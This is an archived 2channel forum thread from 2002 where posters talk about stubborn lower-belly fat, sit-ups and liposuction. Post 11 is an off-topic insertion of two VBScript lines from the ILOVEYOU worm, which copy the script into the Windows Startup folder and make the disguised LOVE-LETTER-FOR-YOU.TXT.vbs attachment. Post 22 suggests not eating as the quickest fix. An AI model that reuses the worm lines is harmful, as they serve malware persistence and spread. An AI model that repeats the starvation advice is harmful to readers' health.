2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

  ■■■下腹の肉が出てる■■■  

1 :1:02/10/07 17:57 ID:vWZzTJLt
25才を過ぎてダイエットして痩せても
下腹の肉だけがぽっこり出てて全く減らなくなりました。
ウエストは細くなるけど下腹の肉は出たまま。
この肉をなんとかしたい。


2 :Miss名無しさん:02/10/07 18:04 ID:???
私もスタイル普通なのに、お腹だけ出てるよ。特に中学あたりからプールは嫌だった。

3 :Miss名無しさん:02/10/07 18:04 ID:???


4 :Miss名無しさん:02/10/07 18:05 ID:???
私も下腹出てるんだよね・・・
腹筋とかしたらどうだろ?

5 :1:02/10/07 18:10 ID:???
私も・・座ったときに下腹が2段腹になってるのがめちゃくちゃ鬱です。
腹筋してもへらなくないですか?
胃のとこは確かに引き締まるけど・・やりかたわるいのかな?

6 :1:02/10/07 18:12 ID:???
水着とか着れない。パンツの上にぽっこり飛び出てる肉が
嫌なんです。

7 :Miss名無しさん:02/10/07 18:31 ID:???
し・・・脂肪吸引しかないのか!Σ( ̄□ ̄ ||

8 :Miss名無しさん:02/10/07 18:33 ID:???
さらし巻いたら?

9 :Miss名無しさん:02/10/07 18:58 ID:WrEiKhCi
29さいです
ウエストが73cmありますが
洋服はウエスト64って言うのでもokです
って事はウエスト70位の人って沢山いるのかなあ?

10 :Miss名無しさん:02/10/07 19:17 ID:???
無理せずに自分にあったものをはきましょう。

11 :Miss名無しさん:02/10/07 19:18 ID:???
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


12 :Miss名無しさん:02/10/07 19:24 ID:W83YjNXO
出てるっていうより
垂れてる。ヤバイ?

13 :Miss名無しさん:02/10/07 19:30 ID:???
ヤバイよ・・・

14 :Miss名無しさん:02/10/07 19:58 ID:???
私も出ててたるんでる。


15 : :02/10/07 20:03 ID:/I+tL2sz
女性はそもそも脂肪がつく様に生まれついているので
モデルの様に「きゅ」っとしてる方が異常な状態です。

建前はここまでで、脂肪吸引してみては?

16 :Miss名無しさん:02/10/07 20:09 ID:GA5oXcO5
>1
もしかして胃下垂じゃないかね?

17 :Miss名無しさん:02/10/07 20:15 ID:WrEiKhCi
脂肪吸引ってマジで聞くの?
あんま変わらないなんて事になったら
30万位損じゃん
どう?

18 :Miss名無しさん:02/10/08 18:40 ID:???
かなり減らしたい!

19 :Miss名無しさん:02/10/09 15:37 ID:???
ストレッチしてますがきくかどうかはわかりませんが。

20 :Miss名無しさん:02/10/13 08:34 ID:???
無理

21 :Miss名無しさん:02/10/18 10:31 ID:???


22 :Miss名無しさん:02/10/20 21:40 ID:???
やはり食べないのが一番早いでしょう。

23 :Miss名無しさん:02/10/20 21:46 ID:+bGf5cgQ
筋肉をつけると、その部分の脂肪がエネルギーとして使われる量が増える。
だから、ダイエットと同時におなかの筋肉をつけると効果的。
具体的には、いわゆる腹筋運動をするとよい。

24 :通勤野郎 ◆ZMV1eRuR8E :02/10/20 21:56 ID:???
>>23

腹筋つけてんだけどなぁ
出てきちゃったよ腹・・・がんばろう

3 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)